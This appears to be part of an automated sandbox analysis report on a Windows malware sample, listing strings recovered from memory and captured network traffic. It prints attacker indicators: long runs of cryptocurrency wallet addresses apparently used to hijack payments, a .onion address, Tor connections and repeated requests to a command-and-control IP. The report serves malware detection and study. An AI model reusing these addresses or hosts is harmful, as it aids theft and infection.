moscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86nband44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbU24188479bnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3E27440746B23181897bitcoincash:cosmosaddrbitcoincash:11650607608992768899L15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86n44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addraddr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbbnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcbandband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3U24188479E27440746B23181897openTldrrbUKRMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.9
            Source: 6K1uYM85lS.exeString found in binary or memory: http%s://%shttps://Proxy-Proxy-Authenticate:NTLMNegotiateKerberosContent-Length:Transfer-Encoding:chunked:443Host:.onion.onionHTTP/1.0 200 OK
            Source: lsass.exe.0.drString found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
            Source: lsass.exe.0.drString found in binary or memory: bitcoincash:cosmosaddrbitcoincash:11650607608992768899Laddr15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86nband44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbU24188479bnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3E27440746B23181897bitcoincash:cosmosaddrbitcoincash:11650607608992768899L15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86n44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addraddr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbbnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcbandband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3U24188479E27440746B23181897openTldrrbUKRMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.9
            Source: lsass.exe.0.drString found in binary or memory: http%s://%shttps://Proxy-Proxy-Authenticate:NTLMNegotiateKerberosContent-Length:Transfer-Encoding:chunked:443Host:.onion.onionHTTP/1.0 200 OK
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49757
            Source: global trafficTCP traffic: 192.168.2.6:49726 -> 193.11.164.243:9030
            Source: global trafficTCP traffic: 192.168.2.6:49727 -> 95.217.42.50:1067
            Source: global trafficTCP traffic: 192.168.2.6:49730 -> 178.170.10.3:9001
            Source: global trafficTCP traffic: 192.168.2.6:49731 -> 157.90.77.166:9001
            Source: global trafficTCP traffic: 192.168.2.6:49741 -> 213.32.71.116:9030
            Source: global trafficTCP traffic: 192.168.2.6:49744 -> 51.15.42.19:9030
            Source: global trafficTCP traffic: 192.168.2.6:49757 -> 149.56.45.200:9030
            Source: global trafficTCP traffic: 192.168.2.6:49758 -> 107.189.8.226:9000
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 193.11.164.243:9030Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02a0d8ddf4da4e601c1c66143bb0c8a0f2f3c857+02c0c261048dd34c4701de9b26748f18bf877d5c+04102613d8f998e956a7868d2de5a532ee2473ea+042bcdf2d36d7aee070e086dad4b57f27b2f1143+07da591e5bb420e5d6460ef146ef6a8776ef6ba5+083c52051140db8af770bd40c7c8883efff4caf3+08cd9d4224058dc97a1f27679a5bee5724c4c6ec+09a70e396de93f54d4541bbb0ec8e2b23761f34f+0c36ae99b744e32088c9ed23d7a31f8d23ae1a58+0c5cfd7cc30251555ac3a8b2f87e523430477fb1+0c68d484c72c44e8f1abef8637c156f69de8f08b+0d0a07d71e8229af56125b8bcb19ecb030b97133+0dc16feaa5a5e27a974009cbf7748bb6faae6de1+0eb05178de949d3e8eeec0bc02ed20ff0995f56c+0f35f5ddd162199b60b2d2cbc9bb7e35a084aff6+0f64a062eeb86ccfd243848263cd69b708bce805.z HTTP/1.1Accept-Encoding: gzipHost: 199.58.81.140Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 86.59.21.38Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 193.11.164.243:9030Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 199.58.81.140Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/0077bcba7244db3e6a5ed2746e86170066684887+00d2ce3c2153ea09786f2105f26b138cf759424f+014326416058dcfd0965167026cbef647409a000+024a48d0eaff4761daa976248343c44f8223f4cc+02c0c261048dd34c4701de9b26748f18bf877d5c+035f813195f0cb9f567edfdf60c6745ca36ba0bd+04102613d8f998e956a7868d2de5a532ee2473ea+04dfe047acdf7a6620aca782fafc5ef1ae7f4754+0823ecb30ec0e634acf0b143127320a828258da8+08b9d6ba5b0e544ed1094a862130a9386cce682c+098f98538a21a16332e8c4b724305c2a3496a467+0a11c7546a1332412d1ebd13bd4c3d6a6644d7e0+0af982cc71a01d95e8959d763d0ec0e5a6c61244+0cf2f07ff0581ebbccdf209e655694358a98d816+0e5c4e180b8ad3260ff54cabbd50c6e80dc4a729+0f1c8168dfd0aadbe61bd71194d37c867fed5a21.z HTTP/1.1Accept-Encoding: gzipHost: 149.56.45.200:9030Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 86.59.21.38Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 131.188.40.189:443Connection: CloseCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 193.11.164.243 193.11.164.243
            Source: Joe Sandbox ViewIP Address: 199.58.81.140 199.58.81.140
            Source: Joe Sandbox ViewIP Address: 199.58.81.140 199.58.81.140
            Source: Joe Sandbox ViewJA3 fingerprint: fc54e0d16d9764783542f0146a98b300
            Source: unknownDNS query: name: api.wipmania.com
            Source: global trafficHTTP traffic detected: GET /c1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: unknownHTTPS traffic detected: 149.56.44.47:443 -> 192.168.2.6:49729 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.81.131.84:443 -> 192.168.2.6:49732 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 207.244.78.230:443 -> 192.168.2.6:49735 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 66.175.235.244:443 -> 192.168.2.6:49736 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.81.131.84:443 -> 192.168.2.6:49759 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.93
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.93
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.93
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.93
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.93
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.93
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.93
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.93
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.93
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.93
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.93
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.93
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.93
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.93
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: unknownTCP traffic detected without corresponding DNS query: 193.11.164.243
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009B0290 memset,InternetOpenA,InternetOpenUrlA,InternetReadFile,strcmp,InternetCloseHandle,InternetCloseHandle,0_2_009B0290
            Source: global trafficHTTP traffic detected: GET /c1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 193.11.164.243:9030Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02a0d8ddf4da4e601c1c66143bb0c8a0f2f3c857+02c0c261048dd34c4701de9b26748f18bf877d5c+04102613d8f998e956a7868d2de5a532ee2473ea+042bcdf2d36d7aee070e086dad4b57f27b2f1143+07da591e5bb420e5d6460ef146ef6a8776ef6ba5+083c52051140db8af770bd40c7c8883efff4caf3+08cd9d4224058dc97a1f27679a5bee5724c4c6ec+09a70e396de93f54d4541bbb0ec8e2b23761f34f+0c36ae99b744e32088c9ed23d7a31f8d23ae1a58+0c5cfd7cc30251555ac3a8b2f87e523430477fb1+0c68d484c72c44e8f1abef8637c156f69de8f08b+0d0a07d71e8229af56125b8bcb19ecb030b97133+0dc16feaa5a5e27a974009cbf7748bb6faae6de1+0eb05178de949d3e8eeec0bc02ed20ff0995f56c+0f35f5ddd162199b60b2d2cbc9bb7e35a084aff6+0f64a062eeb86ccfd243848263cd69b708bce805.z HTTP/1.1Accept-Encoding: gzipHost: 199.58.81.140Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 86.59.21.38Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 193.11.164.243:9030Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /c1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /c6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Host: 185.215.113.93
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 199.58.81.140Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/0077bcba7244db3e6a5ed2746e86170066684887+00d2ce3c2153ea09786f2105f26b138cf759424f+014326416058dcfd0965167026cbef647409a000+024a48d0eaff4761daa976248343c44f8223f4cc+02c0c261048dd34c4701de9b26748f18bf877d5c+035f813195f0cb9f567edfdf60c6745ca36ba0bd+04102613d8f998e956a7868d2de5a532ee2473ea+04dfe047acdf7a6620aca782fafc5ef1ae7f4754+0823ecb30ec0e634acf0b143127320a828258da8+08b9d6ba5b0e544ed1094a862130a9386cce682c+098f98538a21a16332e8c4b724305c2a3496a467+0a11c7546a1332412d1ebd13bd4c3d6a6644d7e0+0af982cc71a01d95e8959d763d0ec0e5a6c61244+0cf2f07ff0581ebbccdf209e655694358a98d816+0e5c4e180b8ad3260ff54cabbd50c6e80dc4a729+0f1c8168dfd0aadbe61bd71194d37c867fed5a21.z HTTP/1.1Accept-Encoding: gzipHost: 149.56.45.200:9030Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 86.59.21.38Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus.z HTTP/1.1Accept-Encoding: gzipHost: 131.188.40.189:443Connection: CloseCache-Control: no-cache
            Source: unknownDNS traffic detected: queries for: api.wipmania.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:38:25 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding 